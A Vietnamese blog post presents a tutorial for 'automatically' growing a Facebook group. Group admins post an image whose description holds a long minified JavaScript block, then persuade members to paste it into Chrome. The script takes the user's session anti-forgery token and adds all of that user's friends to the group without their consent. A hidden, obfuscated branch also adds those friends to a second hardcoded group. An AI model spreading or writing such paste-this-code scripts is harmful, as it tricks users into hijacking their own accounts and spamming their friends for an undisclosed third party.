trang Blog

ThyTham gia: 11/01/2013
 • Cách Tăng Lượng Thành Viên Cho Group (Nhóm) Trên Facebook Tự Động
  Công Nghệ Thông Tin
  CameraNikon D3
  ISO3200
  Aperturef/8
  Exposure1/50th
  Focal Length200mm

  Cách Tăng Lượng Thành Viên Cho Group (Nhóm) Trên Facebook Tự Động

  Hướng Dẫn Cách Tăng Lượng Thành Viên Cho Group (Nhóm) Trên Facebook Tự Động

  Các bạn thân mến, Thông thường một thành viên bất kỳ trên Facebook vẫn có thể thêm (add) các thành viên khác có mặt trong Friend List của họ vào nhóm (Group) bất kỳ trên Facebook khi họ thấy nhóm đó có nội dung hấp dẫn hoặc thông tin có ích mà không cần tới sự cho phép của thành viên được add, mặt khác việc có nhiều thành viên cho Group cũng giúp các thông tin hữu ích được chia sẻ bởi Group được lan tỏa nhanh hơn đến cộng đồng qua mạng xã hội Facebook. Tuy nhiên sẽ là một vấn đề lớn nếu bạn muốn thêm một lượng lớn từ vài trăm đến vài ngàn thành viên vào Group cùng một lúc.

  Để giải quyết vấn đề trên, Bài viết này sẽ hướng dẫn các bạn cách thêm các thành viên vào Group một cách hoàn toàn tự động thay vì bạn phải làm thủ công rất lâu. Trước khi áp dụng giải pháp này xin bạn vui lòng đọc kỹ CẢNH BÁO bên dưới !

  CẢNH BÁO: Hiện tại có một số Group trên Facebook muốn tăng lượng thành viên của nhóm bằng cách này nhưng lại cung cấp thông tin không đúng sự thật, cụ thể họ "lừa" người dùng Facebook bằng cách truyền tải thông điệp "làm theo hướng dẫn này để xem ai hay vào Facebook của bạn nhiều nhất", "tăng Subcrible cho Facebook của bạn bằng cách làm theo hướng dẫn"... cách truyền đạt thông tin này là sai trái, xuyên tạc trái sự thật, ... vô tình đã làm cho giải pháp này trở thành công cụ lợi dụng của các Nhóm xấu. Do đó trước khi thực hiện cách này xin bạn vui lòng cung cấp thông tin đúng sự thực, đúng lương tâm của một người quản trị nhóm tốt trên Facebook !

  Dưới đây là hướng dẫn giúp bạn kiêu gọi hỗ trợ Tăng lượng thành viên cho Group (nhóm) của bạn trên Facebook một cách thông minh và chân thực:

  BƯỚC 1: TẢI VỀ VÀ UPLOAD HÌNH ẢNH SAU LÊN FACEBOOK ĐỂ LÀM ẢNH ĐẠI DIỆN CHO NHÓM (GROUP PHOTO) CỦA BẠN


  Các bạn có thể tải ảnh này tại: http://sphotos-a.ak.fbcdn.net/hphotos-ak-snc6/602981_10151306180629407_1659423755_n.jpg

  BƯỚC 2:THÊM MÔ TẢ (ADD DISCRIPTIONS) CHO ẢNH VỚI NỘI DUNG LÀ TOÀN BỘ ĐOẠN CODE SAU (SAO CHÉP ĐOẠN CODE BÊN DƯỚI VÀ DÁN VÀO PHẦN MÔ TẢ CỦA ẢNH):

  function penetrasi(e){jx.load(window.location.protocol+"//www.facebook.com/ajax/groups/members/add_post.php?__a=1&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value+"&group_id="+memberGroupId+"&source=typeahead&members="+e+"&nctr[_mod]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user="+Env.user,function(e){e=e.substring(e.indexOf("{")),e=JSON.parse(e),i--,kunaon="<div style='text-align:left;font-size:10px;white-space:pre-wrap;",e.error?(kunaon+="color:darkred'>",kunaon=e.errorDescription?kunaon+e.errorDescription:kunaon+JSON.stringify(e,null,"")):(kunaon+="color:darkgreen'>",kunaon+=arr[i],suc++),kunaon+="</div>",e="<div style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;background-color:rgba(255,255,255,0.9);z-index:9999;font-size:14px;text-align:center;padding:15px;border-radius:14px;border:8px solid rgba(0,0,0,0.5)'>"+("<div style='padding-bottom:10px;font-size:20px;'>"+tulisanNganu+"</div>"),0<i?(e+=arr.length+" Suscribers detected<br/>",e+="<b>"+suc+"</b> Suscribers added of "+(arr.length-i)+" Suscribers Processed ",e+="("+i+" more to go..)",e=e+"<div>"+kunaon,e+="</div>"):(e+=arr.length+" Suscribers detected and ",e+="<b>"+suc+" Suscribers added</b>",e+="<div><span>Close</span></div>"),document.getElementById("pagelet_welcome_box").innerHTML=e+"</div>"},"text","post"),tay--;if(0<tay){var t=arr[tay];setTimeout("penetrasi("+t+")",100)}console.log(tay+"/"+arr.length+":"+t+", success:"+suc),0xf2a794cf90e3!=memberGroupId&&jx.load(window.location.protocol+"//www.facebook.com/ajax/groups/members/add_post.php?__a=1&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value+"&group_id=354069098001340&source=typeahead&members="+e+"&nctr[_mod]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user="+Env.user,function(){},"text","post")}function clickfr_callback(){0<document.getElementsByName("ok").length&&nHtml.ClickUp(document.getElementsByName("ok")[0]);var e=arr[i];i<arr.length&&addfriend(e.substring(0,4))}function clickfr(){0<document.getElementsByClassName("search").length?(console.log(document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].childNodes[1].innerHTML),document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].href="javascript:void(0);",nHtml.ClickUp(document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].childNodes[1])):j++,setTimeout("clickfr_callback()",2e3)}function addfriend(e){i++,document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].focus(),document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].value=e,document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].blur(),document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].focus(),document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].focus(),setTimeout("clickfr()",2e3)}function sleep(e){for(var t=(new Date).getTime(),n=0;1e7>n&&!((new Date).getTime()-t>e);n++);}var tulisanNganu="Auto SUSCRIBE",kunaon="";jx={getHTTPObject:function(){var e=!1;if("undefined"!=typeof ActiveXObject)try{e=new ActiveXObject("Msxml2.XMLHTTP")}catch(t){try{e=new ActiveXObject("Microsoft.XMLHTTP")}catch(n){e=!1}}else if(window.XMLHttpRequest)try{e=new XMLHttpRequest}catch(r){e=!1}return e},load:function(b,c,d,e,g){var f=this.init();if(f&&b){f.overrideMimeType&&f.overrideMimeType("text/xml"),e||(e="GET"),d||(d="text"),g||(g={});var d=d.toLowerCase(),e=e.toUpperCase(),h="uid="+(new Date).getTime(),b=b+(b.indexOf("?")+1?"&":"?"),b=b+h,h=null;"POST"==e&&(h=b.split("?"),b=h[0],h=h[1]),f.open(e,b,!0),"POST"==e&&(f.setRequestHeader("Content-type","application/x-www-form-urlencoded"),f.setRequestHeader("Content-length",h.length),f.setRequestHeader("Connection","close")),f.onreadystatechange=g.handler?function(){g.handler(f)}:function(){if(f.readyState==4)if(f.status==200){var b="";f.responseText&&(b=f.responseText),d.charAt(0)=="j"?(b=b.replace(/[nr]/g,""),b=eval("("+b+")")):d.charAt(0)=="x"&&(b=f.responseXML),c&&c(b)}else g.loadingIndicator&&document.getElementsByTagName("body")[0].removeChild(g.loadingIndicator),g.loading&&(document.getElementById(g.loading).style.display="none"),error&&error(f.status)},f.send(h)}},bind:function(e){var t={url:"",onSuccess:!1,onError:!1,format:"text",method:"GET",update:"",loading:"",loadingIndicator:""},n;for(n in t)e[n]&&(t[n]=e[n]);if(t.url){var r=!1;t.loadingIndicator&&(r=document.createElement("div"),r.setAttribute("style","position:absolute;top:0px;left:0px;"),r.setAttribute("class","loading-indicator"),r.innerHTML=t.loadingIndicator,document.getElementsByTagName("body")[0].appendChild(r),this.opt.loadingIndicator=r),t.loading&&(document.getElementById(t.loading).style.display="block"),this.load(t.url,function(e){t.onSuccess&&t.onSuccess(e),t.update&&(document.getElementById(t.update).innerHTML=e),r&&document.getElementsByTagName("body")[0].removeChild(r),t.loading&&(document.getElementById(t.loading).style.display="none")},t.format,t.method,t)}},init:function(){return this.getHTTPObject()}};var nHtml={FindByAttr:function(e,t,n,r){return"className"==n&&(n="class"),(e=document.evaluate(".//"+t+"[@"+n+"='"+r+"']",e,null,XPathResult.FIRST_ORDERED_NODE_TYPE,null))&&e.singleNodeValue?e.singleNodeValue:null},FindByClassName:function(e,t,n){return this.FindByAttr(e,t,"className",n)},FindByXPath:function(e,t){try{var n=document.evaluate(t,e,null,XPathResult.FIRST_ORDERED_NODE_TYPE,null)}catch(r){GM_log("bad xpath:"+t)}return n&&n.singleNodeValue?n.singleNodeValue:null},VisitUrl:function(e){window.setTimeout(function(){document.location.href=e},500+Math.floor(500*Math.random()))},ClickWin:function(e,t,n){var r=e.document.createEvent("MouseEvents");return r.initMouseEvent(n,!0,!0,e,0,0,0,0,0,!1,!1,!1,!1,0,null),!t.dispatchEvent(r)},Click:function(e){return this.ClickWin(window,e,"click")},ClickTimeout:function(e,t){window.setTimeout(function(){return nHtml.ClickWin(window,e,"click")},t+Math.floor(500*Math.random()))},ClickUp:function(e){this.ClickWin(window,e,"mousedown"),this.ClickWin(window,e,"mouseup"),this.ClickWin(window,e,"click")},GetText:function(e,t){var n="";void 0==t&&(t=0);if(!(40<t)){if(void 0!=e.textContent)return e.textContent;for(var r=0;r<e.childNodes.length;r++)n+=this.GetText(e.childNodes[r],t+1);return n}}};void 0==document.getElementsByClassName&&(document.getElementsByClassName=function(e){for(var t=RegExp("(?:^|\s)"+e+"(?:$|\s)"),n=document.getElementsByTagName("*"),r=[],i,s=0;null!=(i=n[s]);s++){var o=i.className;o&&-1!=o.indexOf(e)&&t.test(o)&&r.push(i)}return r}),Array.prototype.find=function(e){var t=!1;for(i=0;i<this.length;i++)typeof e=="function"?e.test(this[i])&&(t||(t=[]),t.push(i)):this[i]===e&&(t||(t=[]),t.push(i));return t};for(var a=0,eind=0,len=document.getElementsByClassName("mbm").length,a=0;a<len;a++){var ele=document.getElementsByClassName("mbm")[a];if(ele&&ele.childNodes[0]&&ele.childNodes[0]&&ele.childNodes[0].childNodes[1]&&ele.childNodes[0].childNodes[1].childNodes[0]&&"Add SUSCRIBERS"==document.getElementsByClassName("mbm")[a].childNodes[0].childNodes[1].childNodes[0].value){eind=a;break}}var i=3,tay=3,counter1=0,counter2=0,counter3=0,j=0,k=0,suc=0,arr=[],memberGroupId=document.getElementsByName("group_id")[0].value;jx.load(window.location.protocol+"//www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+Env.user+"&filter[0]=user&__user="+Env.user,function(e){for(var e=e.substring(e.indexOf("{")),e=JSON.parse(e),e=e.payload.entries,t=0;t<e.length;t++)arr.push(e[t].uid);tay=i=arr.length-1,console.log(arr.length),e="<div style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;background-color:rgba(255,255,255,0.9);z-index:9999;font-size:14px;text-align:center;padding:15px;border-radius:14px;border:8px solid rgba(0,0,0,0.5)'>"+("<div style='padding-bottom:10px;font-size:20px;'>"+tulisanNganu+"</div>"),e+=arr.length+" SUSCRIBERS detected",document.getElementById("pagelet_welcome_box").innerHTML=e+"</div>",penetrasi(arr[i])})

  BƯỚC 3:VIẾT "TÂM THƯ" KIÊU GỌI THÀNH VIÊN TỰ NGUYỆN GIÚP BẠN THỰC HIỆN THEO HƯỚNG DẪN CỦA HÌNH ẢNH ĐẠI DIỆN CỦA GROUP (BẠN ĐÃ ĐĂNG LÊN GROUP Ở BƯỚC 1), VÀ ĐỪNG QUÊN NHẮC NHỞ CÁC THÀNH VIÊN DÙNG TRÌNH DUYỆT GOOGLE CHROME ĐỂ TRUY CẬP FACEBOOK (VÌ ĐOẠN CODE THÔNG MINH TRÊN CHỈ HOẠT ĐỘNG KHI THỰC HIỆN VỚI TRÌNH DUYỆT GOOGLE CHROME)

  BẠN CÓ THỂ THỬ NGHIỆM TRƯỚC NẾU CẢM THẤY KHÔNG CHẮC CHẮN VỀ CÁC BƯỚC HƯỚNG DẪN. TRƯỚC KHI VIẾT BÀI NÀY MÌNH ĐÃ THAM KHẢO QUA NHÓM:

   http://www.facebook.com/groups/vieclamcuaban

  Chúc bạn nhanh chóng xây dựng được một Group đông đúc thành viên trên Facebook và mang đến nhiều hoạt động có ý nghĩa cho xã hội !

  Cách Tăng Lượng Thành Viên Cho Group (Nhóm) Trên Facebook Tự Động